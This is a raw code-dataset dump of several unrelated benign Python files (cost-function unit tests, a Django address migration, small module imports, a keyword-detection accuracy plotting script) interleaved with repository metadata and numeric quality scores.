| 15.875
| 0.842697
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.4
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
fafbab98dabf467268c8f554e8f180b0e764d981
| 24
|
py
|
Python
|
selenium_chrome/models/__init__.py
|
kkristof200/selenium_chrome
|
1bb1f2ac6c0254704607f6f28d80029546043c11
|
[
"MIT"
] | 3
|
2021-07-27T05:22:42.000Z
|
2022-03-21T10:55:32.000Z
|
selenium_chrome/models/__init__.py
|
kkristof200/selenium_chrome
|
1bb1f2ac6c0254704607f6f28d80029546043c11
|
[
"MIT"
] | null | null | null |
selenium_chrome/models/__init__.py
|
kkristof200/selenium_chrome
|
1bb1f2ac6c0254704607f6f28d80029546043c11
|
[
"MIT"
] | 1
|
2021-11-24T07:34:35.000Z
|
2021-11-24T07:34:35.000Z
|
from .prefs import Prefs
| 24
| 24
| 0.833333
| 4
| 24
| 5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 24
| 1
| 24
| 24
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
87eaaa49fd4edf48d2a1048ae772abffc22c089f
| 7,641
|
py
|
Python
|
bob/learn/mlp/test_cost.py
|
bioidiap/bob.learn.mlp
|
c4b1534236c94dc1acf16dcdc6e7d8478cdffd58
|
[
"BSD-3-Clause"
] | null | null | null |
bob/learn/mlp/test_cost.py
|
bioidiap/bob.learn.mlp
|
c4b1534236c94dc1acf16dcdc6e7d8478cdffd58
|
[
"BSD-3-Clause"
] | 6
|
2015-02-26T14:51:51.000Z
|
2017-07-06T11:55:46.000Z
|
bob/learn/mlp/test_cost.py
|
bioidiap/bob.learn.mlp
|
c4b1534236c94dc1acf16dcdc6e7d8478cdffd58
|
[
"BSD-3-Clause"
] | 4
|
2015-06-14T18:24:29.000Z
|
2017-07-05T23:10:34.000Z
|
#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
# Andre Anjos <andre.dos.anjos@gmail.com>
# Fri 7 Jun 08:59:24 2013
"""Test cost functions
"""
import numpy
import math
from . import SquareError, CrossEntropyLoss
from .test_utils import estimate_gradient
from bob.learn.activation import Logistic, Identity
def is_close(x, y, eps=1e-10):
return (abs(x - y) < eps)
def rand_safe0(eps=2e-4):
return numpy.random.rand()*(1-2*eps)+eps
def rand_safe(n, eps=2e-4):
return numpy.random.rand(n)*(1-2*eps)+eps
def rand_safe2(n, p, eps=2e-4):
return numpy.random.rand(n,p)*(1-2*eps)+eps
def rand_safe3(n, p, q, eps=2e-4):
return numpy.random.rand(n,p,q)*(1-2*eps)+eps
def rand_safe4(n, p, q, r, eps=2e-4):
return numpy.random.rand(n,p,q,r)*(1-2*eps)+eps
def test_square_error():
op = SquareError(Identity())
x = rand_safe(10) #10 random numbers between 0 and 1
y = rand_safe(10) #10 random numbers between 0 and 1
# go for an exact match
for p,q in zip(x,y):
expected = 0.5*math.pow(p-q,2)
assert is_close(op.f(p,q), expected), 'SquareError does not perform as expected %g != %g' % (op.f(p,q), expected)
def test_square_error_derivative():
op = SquareError(Identity())
x = rand_safe(10) #10 random numbers between 0 and 1
y = rand_safe(10) #10 random numbers between 0 and 1
# go for an exact match
for p,q in zip(x,y):
expected = p-q
assert is_close(op.f_prime(p,q), expected), 'SquareError derivative does not perform as expected %g != %g' % (op.f(p,q), expected)
# go for approximation
for p,q in zip(x,y):
absdiff = abs(op.f_prime(p,q)-estimate_gradient(op.f,p,args=(q,)))
assert absdiff < 1e-4, 'SquareError derivative and estimation do not match to 10^-4: |%g-%g| = %g' % (op.f_prime(p,q), estimate_gradient(op.f,p,args=(q,)), absdiff)
def test_square_error_error():
act = Logistic()
op = SquareError(act)
x = rand_safe(10) #10 random numbers between 0 and 1
y = rand_safe(10) #10 random numbers between 0 and 1
# go for an exact match
for p,q in zip(x,y):
expected = p*(1-p)*(p-q)
assert is_close(op.error(p,q), expected), 'SquareError error does not perform as expected %g != %g' % (op.error(p,q), expected)
def test_cross_entropy():
op = CrossEntropyLoss(Logistic())
x = rand_safe(10) #10 random numbers between 0 and 1
y = rand_safe(10) #10 random numbers between 0 and 1
# go for an exact match
for p,q in zip(x,y):
expected = -q*math.log(p) - (1-q)*math.log(1-p)
assert is_close(op.f(p,q), expected), 'CrossEntropyLoss does not perform as expected %g != %g' % (op.f(p,q), expected)
def test_cross_entropy_derivative():
op = CrossEntropyLoss(Logistic())
x = rand_safe(10, eps=0.2) #10 random numbers between 0 and 1
y = rand_safe(10, eps=0.2) #10 random numbers between 0 and 1
# go for an exact match
for p,q in zip(x,y):
expected = (p-q)/(p*(1-p))
assert is_close(op.f_prime(p,q), expected), 'CrossEntropyLoss derivative does not perform as expected %g != %g' % (op.f(p,q), expected)
# go for approximation
for p,q in zip(x,y):
reldiff = abs((op.f_prime(p,q)-estimate_gradient(op.f,p,args=(q,))) / op.f_prime(p,q))
assert reldiff < 1e-3, 'SquareError derivative and estimation do not match to 10^-4: |%g-%g| = %g' % (op.f_prime(p,q), estimate_gradient(op.f,p,args=(q,)), reldiff)
def test_square_error_equality():
op1 = SquareError(Identity())
op2 = SquareError(Identity())
assert op1 == op2
def test_cross_entropy_equality():
op1 = CrossEntropyLoss(Identity())
op2 = CrossEntropyLoss(Identity())
assert op1 == op2
def test_cross_entropy_error_with_logistic():
act = Logistic()
op = CrossEntropyLoss(act)
x = rand_safe(10) #10 random numbers between 0 and 1
y = rand_safe(10) #10 random numbers between 0 and 1
# go for an exact match
for p,q in zip(x,y):
expected = p-q
assert is_close(op.error(p,q), expected), 'CrossEntropyLoss+Logistic error does not perform as expected %g != %g' % (op.error(p,q), expected)
def test_cross_entropy_error_without_logistic():
act = Identity()
op = CrossEntropyLoss(act)
x = rand_safe(10) #10 random numbers between 0 and 1
y = rand_safe(10) #10 random numbers between 0 and 1
# go for an exact match
for p,q in zip(x,y):
expected = (p-q)/(p*(1-p))
assert is_close(op.error(p,q), expected), 'CrossEntropyLoss+Identity error does not perform as expected %g != %g' % (op.error(p,q), expected)
def test_cross_entropy_activation_detection():
op = CrossEntropyLoss(Logistic())
assert op.logistic_activation
op = CrossEntropyLoss(Identity())
assert op.logistic_activation == False
def test_1d_ndarray():
C = rand_safe0()
op = SquareError(Identity())
O = rand_safe(10) #10 random numbers between 0 and 1
T = rand_safe(10) #10 random numbers between 0 and 1
Y = op(O,T)
assert Y.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_f = op.f(O,T)
assert Y_f.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_f_prime = op.f_prime(O,T)
assert Y_f_prime.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_error = op.error(O,T)
assert Y_error.shape == O.shape
assert Y.dtype == numpy.dtype(float)
for k,(o,t) in enumerate(zip(O,T)):
assert is_close(op(o,t), Y[k])
assert is_close(op.f(o,t), Y_f[k])
assert is_close(op.f_prime(o,t), Y_f_prime[k])
assert is_close(op.error(o,t), Y_error[k])
def test_2d_ndarray():
C = rand_safe0()
op = SquareError(Identity())
O = rand_safe2(3,3)
T = rand_safe2(3,3)
Y = op(O,T)
assert Y.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_f = op.f(O,T)
assert Y_f.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_f_prime = op.f_prime(O,T)
assert Y_f_prime.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_error = op.error(O,T)
assert Y_error.shape == O.shape
assert Y.dtype == numpy.dtype(float)
for k,(o,t) in enumerate(zip(O.flat,T.flat)):
assert is_close(op(o,t), Y.flat[k])
assert is_close(op.f(o,t), Y_f.flat[k])
assert is_close(op.f_prime(o,t), Y_f_prime.flat[k])
assert is_close(op.error(o,t), Y_error.flat[k])
def test_3d_ndarray():
C = rand_safe0()
op = SquareError(Identity())
O = rand_safe3(3,3,3)
T = rand_safe3(3,3,3)
Y = op(O,T)
assert Y.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_f = op.f(O,T)
assert Y_f.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_f_prime = op.f_prime(O,T)
assert Y_f_prime.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_error = op.error(O,T)
assert Y_error.shape == O.shape
assert Y.dtype == numpy.dtype(float)
for k,(o,t) in enumerate(zip(O.flat,T.flat)):
assert is_close(op(o,t), Y.flat[k])
assert is_close(op.f(o,t), Y_f.flat[k])
assert is_close(op.f_prime(o,t), Y_f_prime.flat[k])
assert is_close(op.error(o,t), Y_error.flat[k])
def test_4d_ndarray():
C = rand_safe0()
op = SquareError(Identity())
O = rand_safe4(2,2,2,2)
T = rand_safe4(2,2,2,2)
Y = op(O,T)
assert Y.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_f = op.f(O,T)
assert Y_f.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_f_prime = op.f_prime(O,T)
assert Y_f_prime.shape == O.shape
assert Y.dtype == numpy.dtype(float)
Y_error = op.error(O,T)
assert Y_error.shape == O.shape
assert Y.dtype == numpy.dtype(float)
for k,(o,t) in enumerate(zip(O.flat,T.flat)):
assert is_close(op(o,t), Y.flat[k])
assert is_close(op.f(o,t), Y_f.flat[k])
assert is_close(op.f_prime(o,t), Y_f_prime.flat[k])
assert is_close(op.error(o,t), Y_error.flat[k])
| 29.164122
| 168
| 0.668368
| 1,419
| 7,641
| 3.481325
| 0.085976
| 0.015385
| 0.060526
| 0.069838
| 0.814372
| 0.804453
| 0.787854
| 0.765182
| 0.733198
| 0.677328
| 0
| 0.03126
| 0.175239
| 7,641
| 261
| 169
| 29.275862
| 0.752618
| 0.11242
| 0
| 0.607955
| 0
| 0
| 0.084037
| 0.007411
| 0
| 0
| 0
| 0
| 0.346591
| 1
| 0.113636
| false
| 0
| 0.028409
| 0.034091
| 0.176136
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e20a6f76e846aa1b60a87f57df9b45d073789c54
| 155
|
py
|
Python
|
mpst_ts/utils/__init__.py
|
stscript-cgo/STScript
|
d2ab2a05b997e9487fd3057a38dcec67feb20e53
|
[
"Apache-2.0"
] | null | null | null |
mpst_ts/utils/__init__.py
|
stscript-cgo/STScript
|
d2ab2a05b997e9487fd3057a38dcec67feb20e53
|
[
"Apache-2.0"
] | null | null | null |
mpst_ts/utils/__init__.py
|
stscript-cgo/STScript
|
d2ab2a05b997e9487fd3057a38dcec67feb20e53
|
[
"Apache-2.0"
] | null | null | null |
from .template_generator import TemplateGenerator
import mpst_ts.utils.type_declaration as type_declaration
import mpst_ts.utils.role_parser as role_parser
| 51.666667
| 57
| 0.896774
| 23
| 155
| 5.73913
| 0.565217
| 0.151515
| 0.181818
| 0.257576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070968
| 155
| 3
| 58
| 51.666667
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
3574fa4e6ecb3a4464717078c8132107123521b4
| 169
|
py
|
Python
|
reservi/src/admin.py
|
reservi/api_server
|
e098e51f13eb5797a7a4b5236410367525a72f46
|
[
"MIT"
] | null | null | null |
reservi/src/admin.py
|
reservi/api_server
|
e098e51f13eb5797a7a4b5236410367525a72f46
|
[
"MIT"
] | null | null | null |
reservi/src/admin.py
|
reservi/api_server
|
e098e51f13eb5797a7a4b5236410367525a72f46
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Country
from .models import Sex
# Register your models here.
admin.site.register(Country)
admin.site.register(Sex)
| 21.125
| 32
| 0.804734
| 25
| 169
| 5.44
| 0.48
| 0.147059
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118343
| 169
| 8
| 33
| 21.125
| 0.912752
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
35938771c0f42abe1369fd08bb89fc79f875323b
| 49
|
py
|
Python
|
.history/__init___20210908040237.py
|
GraceOswal/NewsRoom
|
591d3559dc313564695ce7fbb0052ebeceea5cc3
|
[
"MIT"
] | null | null | null |
.history/__init___20210908040237.py
|
GraceOswal/NewsRoom
|
591d3559dc313564695ce7fbb0052ebeceea5cc3
|
[
"MIT"
] | null | null | null |
.history/__init___20210908040237.py
|
GraceOswal/NewsRoom
|
591d3559dc313564695ce7fbb0052ebeceea5cc3
|
[
"MIT"
] | null | null | null |
from flask import Flask
#initializing application
| 24.5
| 25
| 0.877551
| 6
| 49
| 7.166667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 49
| 2
| 25
| 24.5
| 0.977273
| 0.489796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ea022414e3afdc032cd0c75586eb752bccee6928
| 31
|
py
|
Python
|
conftest.py
|
syscocloud/puppetboard
|
94052a0330b1e73963504a2a2fff9dbab52b2a87
|
[
"Apache-2.0"
] | 352
|
2016-01-04T21:27:26.000Z
|
2022-03-22T14:04:47.000Z
|
conftest.py
|
syscocloud/puppetboard
|
94052a0330b1e73963504a2a2fff9dbab52b2a87
|
[
"Apache-2.0"
] | 465
|
2016-01-06T14:39:56.000Z
|
2022-03-29T18:20:06.000Z
|
conftest.py
|
syscocloud/puppetboard
|
94052a0330b1e73963504a2a2fff9dbab52b2a87
|
[
"Apache-2.0"
] | 208
|
2016-01-08T20:08:37.000Z
|
2022-03-29T14:34:38.000Z
|
import puppetboard
import test
| 10.333333
| 18
| 0.870968
| 4
| 31
| 6.75
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 31
| 2
| 19
| 15.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ea0e964de532634b4e38e0819aade453c3b8171a
| 22
|
py
|
Python
|
src/getkw/__init__.py
|
dagesundholm/DAGE
|
0d0ef1d3e74ba751ca4d288db9f1ac7f9a822138
|
[
"MIT"
] | 3
|
2018-03-29T08:48:57.000Z
|
2020-02-16T22:40:22.000Z
|
src/getkw/__init__.py
|
dagesundholm/DAGE
|
0d0ef1d3e74ba751ca4d288db9f1ac7f9a822138
|
[
"MIT"
] | null | null | null |
src/getkw/__init__.py
|
dagesundholm/DAGE
|
0d0ef1d3e74ba751ca4d288db9f1ac7f9a822138
|
[
"MIT"
] | 1
|
2019-04-08T14:40:57.000Z
|
2019-04-08T14:40:57.000Z
|
from .getkw import *
| 7.333333
| 20
| 0.681818
| 3
| 22
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.227273
| 22
| 2
| 21
| 11
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ea9e3548417dd6947f17c09904986ff8700186d9
| 25
|
py
|
Python
|
dependencies/georeference maps/pythongis/vector/fileformats/thirdparty/stata_dta/__init__.py
|
karimbahgat/AutoMap
|
eae52f16b7ce71cb2b4b7ae67cf6e4680ea2194f
|
[
"MIT"
] | 9
|
2015-03-05T01:47:50.000Z
|
2022-03-21T02:16:42.000Z
|
dependencies/georeference maps/pythongis/vector/fileformats/thirdparty/stata_dta/__init__.py
|
karimbahgat/AutoMap
|
eae52f16b7ce71cb2b4b7ae67cf6e4680ea2194f
|
[
"MIT"
] | 1
|
2021-05-13T06:00:41.000Z
|
2021-05-13T06:00:41.000Z
|
dependencies/georeference maps/pythongis/vector/fileformats/thirdparty/stata_dta/__init__.py
|
karimbahgat/AutoMap
|
eae52f16b7ce71cb2b4b7ae67cf6e4680ea2194f
|
[
"MIT"
] | 8
|
2015-04-01T00:31:02.000Z
|
2021-01-08T04:17:31.000Z
|
from .stata_dta import *
| 12.5
| 24
| 0.76
| 4
| 25
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
57ac86cc2c6236f087b743b518df4d52e077f0b4
| 4,081
|
py
|
Python
|
address/migrations/0001_initial.py
|
theonlykingpin/snapfoodclone
|
0c1a7839424e89d9bc7bfb55c150a92055759702
|
[
"MIT"
] | 11
|
2021-09-17T07:44:05.000Z
|
2022-02-06T08:33:30.000Z
|
address/migrations/0001_initial.py
|
theonlykingpin/snapfoodclone
|
0c1a7839424e89d9bc7bfb55c150a92055759702
|
[
"MIT"
] | 1
|
2021-10-09T07:37:14.000Z
|
2021-10-09T07:37:14.000Z
|
address/migrations/0001_initial.py
|
theonlykingpin/snapfoodclone
|
0c1a7839424e89d9bc7bfb55c150a92055759702
|
[
"MIT"
] | 3
|
2021-09-27T14:12:13.000Z
|
2021-10-18T12:21:37.000Z
|
# Generated by Django 3.2 on 2021-08-28 20:31
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='State',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='created time')),
('modified_time', models.DateTimeField(auto_now=True, verbose_name='modified time')),
('name', models.CharField(max_length=20, verbose_name='name')),
('slug', models.SlugField(allow_unicode=True, max_length=25, verbose_name='slug')),
],
options={
'verbose_name': 'State',
'verbose_name_plural': 'States',
'db_table': 'state',
},
),
migrations.CreateModel(
name='City',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='created time')),
('modified_time', models.DateTimeField(auto_now=True, verbose_name='modified time')),
('name', models.CharField(max_length=20, verbose_name='name')),
('slug', models.SlugField(allow_unicode=True, max_length=25, verbose_name='slug')),
('state', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cities', to='address.state', verbose_name='state')),
],
options={
'verbose_name': 'City',
'verbose_name_plural': 'Cities',
'db_table': 'city',
},
),
migrations.CreateModel(
name='Area',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='created time')),
('modified_time', models.DateTimeField(auto_now=True, verbose_name='modified time')),
('name', models.CharField(max_length=20, verbose_name='name')),
('slug', models.SlugField(allow_unicode=True, max_length=25, verbose_name='slug')),
('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='areas', to='address.city', verbose_name='city')),
],
options={
'verbose_name': 'Area',
'verbose_name_plural': 'Areas',
'db_table': 'area',
},
),
migrations.CreateModel(
name='Address',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='created time')),
('modified_time', models.DateTimeField(auto_now=True, verbose_name='modified time')),
('floor', models.SmallIntegerField(verbose_name='floor')),
('plaque', models.SmallIntegerField(verbose_name='plaque')),
('area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='address.area', verbose_name='area')),
('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='address.city', verbose_name='city')),
('state', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='address.state', verbose_name='state')),
],
options={
'verbose_name': 'Address',
'verbose_name_plural': 'Addresses',
'db_table': 'address',
},
),
]
| 50.382716
| 158
| 0.584906
| 412
| 4,081
| 5.580097
| 0.162621
| 0.157895
| 0.080035
| 0.093954
| 0.737712
| 0.737712
| 0.717268
| 0.717268
| 0.717268
| 0.679426
| 0
| 0.008734
| 0.270522
| 4,081
| 80
| 159
| 51.0125
| 0.76352
| 0.010537
| 0
| 0.520548
| 1
| 0
| 0.166501
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027397
| 0
| 0.082192
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
57cc92cf237bd326b7cac7c3eb58835582da6dd7
| 32
|
py
|
Python
|
src/cms_jetnet/processors/__init__.py
|
rkansal47/cms_jetnet
|
2ec587d3dd5c6dca78206018e592366151334e9b
|
[
"MIT"
] | null | null | null |
src/cms_jetnet/processors/__init__.py
|
rkansal47/cms_jetnet
|
2ec587d3dd5c6dca78206018e592366151334e9b
|
[
"MIT"
] | null | null | null |
src/cms_jetnet/processors/__init__.py
|
rkansal47/cms_jetnet
|
2ec587d3dd5c6dca78206018e592366151334e9b
|
[
"MIT"
] | null | null | null |
from .DatasetProcessor import *
| 16
| 31
| 0.8125
| 3
| 32
| 8.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 32
| 1
| 32
| 32
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
17b2e65894405696b37237bb8145401598616815
| 62
|
py
|
Python
|
evolutionary/operators/crossover.py
|
fedepare/evolutionary
|
690ba3f744e2b9b83c9d0945b6e05f76be93788f
|
[
"MIT"
] | 1
|
2020-07-08T11:32:24.000Z
|
2020-07-08T11:32:24.000Z
|
evolutionary/operators/crossover.py
|
fedepare/evolutionary
|
690ba3f744e2b9b83c9d0945b6e05f76be93788f
|
[
"MIT"
] | 1
|
2020-07-28T11:16:57.000Z
|
2020-09-24T17:28:18.000Z
|
evolutionary/operators/crossover.py
|
fedepare/evolutionary
|
690ba3f744e2b9b83c9d0945b6e05f76be93788f
|
[
"MIT"
] | 1
|
2020-07-28T12:02:59.000Z
|
2020-07-28T12:02:59.000Z
|
def crossover_none(mother, father):
return mother, father
| 20.666667
| 35
| 0.758065
| 8
| 62
| 5.75
| 0.75
| 0.521739
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 62
| 2
| 36
| 31
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
17c3cc1f6ea3270b77093854c512d7f8473b2e7d
| 5,949
|
py
|
Python
|
Modell/CSV/diagramm_tf_genauigkeit.py
|
NoahEmbedded/EmbeddedKWD
|
2380d56b0b75bae4fedeb60885358332766f7319
|
[
"MIT"
] | null | null | null |
Modell/CSV/diagramm_tf_genauigkeit.py
|
NoahEmbedded/EmbeddedKWD
|
2380d56b0b75bae4fedeb60885358332766f7319
|
[
"MIT"
] | null | null | null |
Modell/CSV/diagramm_tf_genauigkeit.py
|
NoahEmbedded/EmbeddedKWD
|
2380d56b0b75bae4fedeb60885358332766f7319
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
#Input = Sprache
#output sprache
spIn_spOut = np.array([100,100,0.61,99.84,99.17,100,98.2,100,100,100,92.67,99.98,100,99.84,100,96.43,99.99,100,99.97,97.62,100,100,92.77,100,99.93,96.97,100,100,100,100,94.32,97.25,88.54,100,78.25,100,100,82.26,100,100,99.99,11.78,77.43,100,100,99.69,100,99.66,99.99,100,100,98.32,2.45,100,4.2,26.09,98.98,96.09,94.92,82.16,100,99.99,100,100,4.92,1.98,100,86.59,97.08,100,99.94,100,100,100,100,100,99.97,11.96,100,85.7,93.36,100,99.95,0.76,100,100,100,100,99.99,100,93.68,100,79.97,100,100,100,99.98,100,99.93,100,50.76,100,100,76.21,99.89,100,100,76.73,17.59,100,66.92,95.29,100,97.4,99.69,99.85,99.99,100,100,1.11,98.35,100,100,99.75,99.98,100,100,100,100,100,100,98.49,100,99.99,12.14,100,100,71.05,100,99.96,100,99.67,99.98,100,99.19,97.06,97.42,86.73,55.24,35.23,100,100,100,100,14.57,100,100,99.89,100,99.87,100,100,100,100,99.99,100,100,100,99.92,70.29,100,100,100,99.98,99.11,100,100,100,99.98,56.94,98.76,92.32,1.88,99.69,99.96,99.74,99.01,96.03,59.72,100,100,0.77,100,100,100,15.04,100,47.34,100,96.9,100,99.68,100,65.52,100,99.03,94.87,100,98.33,99.24,99.9,100,4.81,100,100,95.19,99.51,99.92,1.18,100,100,100,96.91,99.99,4.31,0,92.39,100,98.56,100,100,100,0,100,56.89,100,100,100,100,97.98,4.64,34.55,99.71,99.22,72.04,99.92,97.49,100,100,100,96.51,7.58,99.96,100,99.96,100,0.69,100,99.74,0.66,99.99,100,99.81,100,0.04,100,100,100,99.99,99.54,57.23,99.71,100,99.97,100,99.94,7.01,100,100,100,99.63,100,100,100,98.88,98.31,99.89,100,98.73,99.96,100,99.99,99.82,100,99.99,99.86,99.98,99.54,100,92.38])
#output marvin
